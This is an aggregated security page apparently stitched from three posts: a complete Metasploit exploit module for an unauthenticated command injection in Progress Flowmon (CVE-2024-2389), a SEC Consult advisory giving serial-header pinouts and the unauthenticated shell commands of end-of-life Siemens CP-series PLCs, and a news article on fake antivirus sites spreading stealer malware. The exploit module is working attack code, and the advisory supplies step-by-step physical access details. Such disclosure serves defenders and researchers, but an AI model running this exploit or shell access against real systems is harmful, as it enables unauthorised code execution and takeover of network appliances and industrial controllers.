    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Flowmon Unauthenticated Command Injection',        'Description' => %q{          This module exploits an unauthenticated command injection vulnerability in Progress Flowmon          versions before v12.03.02.        },        'Author' => [          'Dave Yesland with Rhino Security Labs',        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-2389'],          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/'],          ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability']        ],        'DisclosureDate' => '2024-04-23',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],          'Reliability' => [ REPEATABLE_SESSION ]        },        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD],        'Targets' => [['Automatic', {}]],        'Privileged' => false,        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 443        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/'])    ])  end  def execute_command(cmd)    send_request_cgi(      'uri' => normalize_uri(datastore['TARGETURI'], 'service.pdfs', 'confluence'),      'method' => 'GET',      'vars_get' => {        'file' => rand_text_alphanumeric(8),        'lang' => rand_text_alphanumeric(8),        'pluginPath' => "$(#{cmd})"      }    )  end  def exploit    print_status('Attempting to execute payload...')    execute_command(payload.encoded)  end  def check    print_status("Checking if #{peer} can be exploited!")    uri = normalize_uri(target_uri.path, 'homepage/auth/login')    res = send_request_cgi(      'uri' => uri,      'method' => 'GET'    )    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Safe('Target does not appear to be running Progress Flowmon') unless res.code == 200 && res.get_html_document.xpath('//title').text == 'Flowmon Web Interface'    # Use a regular expression to extract the version number from the response    version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)})    return CheckCode::Unknown('Unable to determine the version from the favicon link.') unless version && version[1]    print_status("Detected version: #{version[1]}")    if Rex::Version.new(version[1]) <= Rex::Version.new('12.03.02')      CheckCode::Vulnerable("Version #{version[1]} is vulnerable.")    else      CheckCode::Safe("Version #{version[1]} is not vulnerable.")    end  endend

Flowmon Unauthenticated Command Injection

Siemens CP-XXXX Series (CP-2014, CP-2016, CP-2017, CP-2019, CP-5014) expose serial shells on multiple PLCs. A serial interface can be accessed with physical access to the PCB. After connecting to the interface, access to a shell with various debug functions as well as a login prompt is possible. The hardware is no longer produced nor offered to the market.

SEC Consult Vulnerability Lab Security Advisory < 20240524-0 >  
=======================================================================  
               title: Exposed Serial Shell on multiple PLCs  
             product: Siemens CP-XXXX Series (CP-2014, CP-2016, CP-2017, CP-2019, CP-5014)  
  vulnerable version: All hardware revisions  
       fixed version: Hardware is EOL, no fix  
          CVE number: -  
              impact: Low  
            homepage: https://www.siemens.com  
               found: ~2023-06-01  
                  by: Steffen Robertz (Office Vienna)  
                      Gerhard Hechenberger (Office Vienna)  
                      Constantin Schieber-Knöbl (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"We are a technology company focused on industry, infrastructure,  
transport, and healthcare. From more resource-efficient factories,  
resilient supply chains, and smarter buildings and grids, to cleaner  
and more comfortable transportation as well as advanced healthcare,  
we create technology with purpose adding real value for customers."

Source: https://new.siemens.com/global/en/company/about.html

Business recommendation:  
------------------------  
The hardware is no longer produced nor offered to the market. Hence  
HW adaptions resulting in modified products are not possible anymore.  
The described HW behavior on this generation of devices cannot be  
corrected by means of FW patches.

The risk of successful exploitation is considered low as physical access to  
those devices is needed.

SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Exposed Serial Shell on multiple Siemens PLCs  
A serial interface can be accessed with physical access to the PCB. After  
connecting to the interface, access to a shell with various debug functions  
as well as a login prompt is possible.

Proof of concept:  
-----------------  
1) Exposed Serial Shell on multiple Siemens PLCs

* CP-2016 (Figure 1)  
The serial interface on the CP-2016 can be accessed by connecting to the  
following through hole pins of an unpopulated header:

  +-+  
  |o|  
  |o|RX  
  |o|TX  
  |o|  
  |o|  
  |o|GND  
  +-+

* CP-2019 (Figure 2)  
The serial interface on the CP-2019 can be accessed by connecting to the  
following through hole pins of an unpopulated header:

  +-+  
  |o|  
  |o|RX  
  |o|TX  
  |o|  
  |o|  
  |o|GND  
  +-+

  * CP-2014 (Figure 3)  
The serial interface on the CP-2014 can be accessed by connecting to the  
following through hole pins of an unpopulated header:

  +-+  
  |o|GND  
  |o|  
  |o|  
  |o|RX  
  |o|TX  
  |o|  
  +-+

  * CP-2017 (Figure 4)  
The serial interface on the CP-2017 can be accessed on the compute module  
by connecting to pins 9 and 10 on the populated SMD connector:

   1              TX RX  
   '-'-'-'-'-'-'-'-'-'  
  /-------------------\  
  |                   |  
  |-------------------|  
  +'-'-'-'-'-'-'-'-'-'+  
   11                20

* CP-5014 (Figure 5)  
The serial interface on the CP-5014 can be accessed on the compute module  
by connecting to pins 1 and 2 on the populated SMD connector:

  RX TX              10  
   '-'-'-'-'-'-'-'-'-'  
  /-------------------\  
  |                   |  
  |-------------------|  
  +'-'-'-'-'-'-'-'-'-'+  
   11                20

All serial connections allow access to the SH1703 shell in version 1.00.  
The shell requires no authentication and allows the usage of multiple  
commands.

The following output can be seen on all devices:

---------------------------------------------------  
    XXXXX  XXX XXX      X     XXXXX    XXX     XXX  
   X     X  X   X     XXX     X   X   X   X   X   X  
   X        X   X       X        X    X   X       X  
    XXXXX   XXXXX       X        X    X   X     XX  
         X  X   X       X       X     X   X       X  
   X     X  X   X       X      X      X   X   X   X  
    XXXXX  XXX XXX    XXXXX    X       XXX     XXX  
---------------------------------------------------

1703 Shell [V1.00]  
(c) by 1703 Development Team

type 'help' or '?' or press 'F1' for help

SH1703>

Initialize system ..  
. Init Done.

system startup after Power-Up ...  
Install device 'USB Server'.

  RTC time not valid

  RTC time not valid

  RTC time not valid  
Reg: 100 Komp: 2 BSE: 20  
Hello from <R#100 / K#2 / BSE#2> FW-ID: 2019 FW-Version: 0.06A01  
Startup ZBGs ... done.

system ready  
SH1703>help  
Available commands:  
  hist                             Display command history  
!<n>                             Execute <n> command from stack  
  ?        [<cmd>]                 Display this message  
  help     [<cmd>]                 Display this message  
  echo     <text>                  Displays text  
  call     <file>                  Run script file  
  cls                              Clear screen  
  loop     <cmd>                   Loop-execution of cmd  
  ldfile   <file>                  Load ascii file  
  db       <a> [-b|w|d<x> [-n<x>]] Display memory byte/word/dword  
  wb       <a> <val> [-b|w|d<x>]   Write memory byte/word/dword  
  mb       <a> [-b|w|d<x> [-n<x>]] Monitoring memory byte/word/dword  
  login                            Login  
  logoff                           Logoff  
  pci      ...                     PCI Commands  
  bemrk                            Run Benchmark  
  drv                              List installed drives  
  dir                              List files in directory  
  del      [<drv:>]<file>          Delete file  
  ren      <src> <dest>            Rename or move file  
  cd       <dir>|<..>              Change current directory or drive  
  md       <dir>                   Make directory  
  rd       <dir>                   Remove directory  
  type     [<drv:>]<file>          Displays the contents of a file  
  copy     <src> <dest>            Copy a file  
  findstr  <file> <str>            Find a string in a textfile  
  mkdisk   <drvname> <size>        Make a Ramdisk  
  uidisk   <drvname>               Close and uninstall a disk  
  format   <drvname>               Format drive  
  mem_wr   <addr> <size> <des>     Write mem to file  
  idr                              Read from diagnostic ring  
  icr                              Clear diagnostic ring  
  idd                              Debug-Trace ON  
  bp                               Read all breakpoint settings  
  bpf      [<file>]                Set File for Debugprint (no arg = stdout)  
  is       ...                     Debugger settings  
  ig       [f|s]                   Display BPs / Clear all BPs  
  idb                              Read DB-Breaks  
  idt                              Read DB-Trace Settings  
  icz                              Clear breakpoint counters  
  dev      ...                     ZIO-Device commands  
  bsp      ...                     bsp commands  
  ftrc     ...                     FTRC Commands  
  banner                           Display the banner  
  pl                               Display process list  
  pi       [<appl_nr>]             Display process info  
  ad       -c|d|k|s                APP-Debug Create|Detach|Kill|Start  
  tl                               Display task list (all processes)  
  tm       [-r]                    Display task monitor (-r = runtime)  
  tc       <taskname>              Display task context  
  td       <taskID>                Display task descriptor  
  tq                               Display task queues  
  sysztsk                          Display ZOS-tasks of system process  
  appztsk  [<appl_nr>]             Display ZOS-tasks of appl-process(es)  
  stack                            Display stack usage of all tasks  
  stsk     -c|d|e|s|r              ZOS-Task Create|Del|Exch|Suspend|Resume  
  tsktrc   -s|r|c                  ZOS-Task-Trace Start|Read|Clear  
  set      [<name>=<val>]          Display, set or remove environment variables  
  time                             Display the current time  
  timeset                          Set the current time  
  mem                              Display memory usage  
  status                           Display system status informations  
  ver                              Display version informations  
  r                                Reset system element (R,R Cxx,R Pxx,R Zxx  
  klog     [dis|ena|all]           Display, disable or enable kernel logging  
  psp_info                         Display prozessor configuration infos  
  int_info                         Interrupt-Info-List  
  int_gen                          Generate Interrupt (for Admin only)  
  tlbs                             Display TLBs  
  ga       [<appl_nr>]             Start Subshell of application  
  tsd                              Debug Timeserver  
  mci                              MCI Commands  
  usb      <cmd>                   USB commands  
  mmc      <cmd>                   MMC Commands  
  zhs                              ZHS commands  
  zpv                              Parameter infos  
  zdt                              data transporter  
  fsn                              ZIO/FSN statistics  
  net      <enet|emac|mal> <dev>   Network statistics  
  prd      <pg> <reg> <len>        Read PHY register (len: 8|16|32)  
  pwr      <pg> <reg> <len> <data> Write PHY register (len: 8|16|32)  
  rmib                             Reset all statistic counters  
  scfg                             Display broadcom switch registers  
  ipaddr   <dev>                   Display ip addresses on interface  
  route                            Display routing table  
  socket                           Display socket statistic  
  tcp                              Display tcp statistic  
  udp                              Display udp statistic  
  arp                              Display arp cache  
  ping     host-ipaddr             send ICMP ECHO_REQUEST to a host  
  arl                              Switch Address Resolution table  
  ebuf                             Statistic for Buffer handling FSN  
  tls_ciph                         print cipher suites for all connections  
  tls_obj  idx                     print connection objects  
  tls_log                          log level for tls lib  
  tls_deb  idx                     print connection debug cnts  
  tlscache                         print cert/key cache  
  opensslm                         print mem pool statistic for openssl  
  tlsdeb_s                         START mem pool debug function  
  tlsdeb_e                         END mem pool debug function  
  tlsdeb_r                         print mem pool debug for openssl  
  tlsdeb_c                         CLEAR mem pool debug function  
  sap                              special application function  
Available Function-Keys:  
  F1     Help  
  F2     Display system status informations  
  F3     Display Last command  
  F5     Display the current time  
  F7     History  
  F8     Display memory usage  
  F9     Display ZOS-Task Infos  
  F10    Display Tasklist  
  F11    Execute Last command  
SH1703>

----------------------------------------

Vulnerable / tested versions:  
-----------------------------  
The following versions have been tested which were the latest version available  
at the time of the test:  
* CP-2016: CPCX26 V0.06A01  
* CP-2019: PCCX26 V0.06A01  
* CP-2014: CPCX25 V0.05A04  
* CP-2017: PCCX25 V0.11A10  
* CP-5056: CPCX55 V0.10A04

Vendor contact timeline:  
------------------------  
2024-03-05: Contacting vendor through productcert@siemens.com  
2024-03-06: Siemens tracks this issue as case #04393  
2024-04-03: Requested status update.  
2024-04-03: Product is EOL, no fix planned.  
2024-04-29: Informed Siemens about planned publication of advisory.  
2024-04-30: Siemens, requests draft of advisory. Advisory is sent for review.  
2024-05-07: Siemens requested small changes in the Solution and Business  
             Recommendation.  
2024-05-24: Public release of security advisory.

Solution:  
---------  
The hardware is no longer produced nor offered to the market. Hence HW  
adaptions resulting in modified products are not possible anymore. The  
described HW behavior on this generation of devices cannot be corrected  
by means of FW patches.

The risk of successful exploitation is considered low as physical access to  
those devices is needed.

Workaround:  
-----------  
Make sure to strictly limit physical access to the PLC during and also  
after its life cycle.

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Steffen Robertz, Gerhard Hechenberger, Constantin Schieber-Knöbl / @2024

Siemens CP-XXXX Series Exposed Serial Shell

By Deeba Ahmed
Trellix research exposes the dangers of fake antivirus websites disguised as legitimate security software but harbouring malware. Learn…
This is a post from HackRead.com Read the original post: Fake Antivirus Sites Spread Malware Disguised as Avast, Malwarebytes, Bitdefender

Trellix research exposes the dangers of fake antivirus websites disguised as legitimate security software but harbouring malware. Learn how to identify these scams and protect yourself from threats like identity theft and ransomware attacks.

Imagine searching online for an antivirus program to protect your computer, only to stumble upon a website that infects your device with information stealers. This is the deceptive tactic employed by fake antivirus (AV) sites, a growing threat detailed in Trellix’s research titled “A Catalog of Hazardous AV Sites – A Tale of Malware Hosting.”

****Deception Disguised as Security****

In April 2024, Trellix Advanced Research Center team members discovered several fake antivirus sites hosting sophisticated malicious files like APK, EXE, and Inno setup installers. These sites are used to distribute SpyNote trojan, Lumma malware, and StealC malware. The malware hosts include avast-securedownload.com, bitdefender-app.com, and malwarebytes.pro.

****Avast-securedownload.com:****

It hosts a sophisticated APK called Avast.apk that delivers SpyNote Trojan, which can install and delete packages, read call logs, SMS, contacts, storage data, phone state, and more. It also has a recorder, touch activity tracker, and update capabilities.

****Bitdefender-app.com:****

This website delivers a zip file with an EXE named “setup-win-x86-x64.exe.zip” with a discreet TLS callback function. It delivers Lumma malware, targeting sensitive information like PC name, username, HWID, screen resolution, CPU, installed memory, running process, login data, history, cookies, tokens, and user profile information.

****Malwarebytes.pro:****

The website delivers RAR files containing legitimate DLLs, Inno Setup, and StealC infostealing malware. The contents are compressed in gzip and transferred to the attacker’s C2 server. The stolen information includes account tokens, Steam tokens, saved card details, system profiles, Telegram logins, running process names, installed browser lists, and common system information.

****Malicious Binaries****

According to Trellix’s blog post, researchers also discovered a binary called AMCoreDat.exe, which facilitates the deployment of stealer malware. The attacker uses a sophisticated method to obfuscate the payload, stealing victim information, including PC name, username, browsing history, cookies, tokens, etc., and sends it to a C2 server.

Fake Avast, Malwarebytes and Bitdefender sites reported by Trellix

****Possible Dangers****

Unaware users, seeking to safeguard their devices, get easily tricked into downloading malicious software disguised as antivirus programs because these sites appear professional, complete with logos, fake testimonials, and urgency-inducing language about potential threats.

The consequences of falling victim to these scams can be severe, including identity theft, financial loss, sensitive data breaches, ransomware attacks and potentially hefty ransom demands.

Researchers suspect these website addresses are distributed by malicious advertising and SEO poisoning strategies. To mitigate risks, it is recommended to follow security measures like using strong cybersecurity solutions, avoiding pirated software, and verifying software legitimacy with your end-point provider.

1.  Malicious Android Apps Masked as Anti-virus Software
2.  Fake Popular Software Ads Deliver MadMxShell Backdoor
3.  Fake Skype, Zoom, Google Meet Sites Spread Multiple RATs
4.  Hackers steal source code of top anti-virus firms to sell online
5.  Fake LastPass Password Manager App Lurks on iOS App Store

Tag

#ssl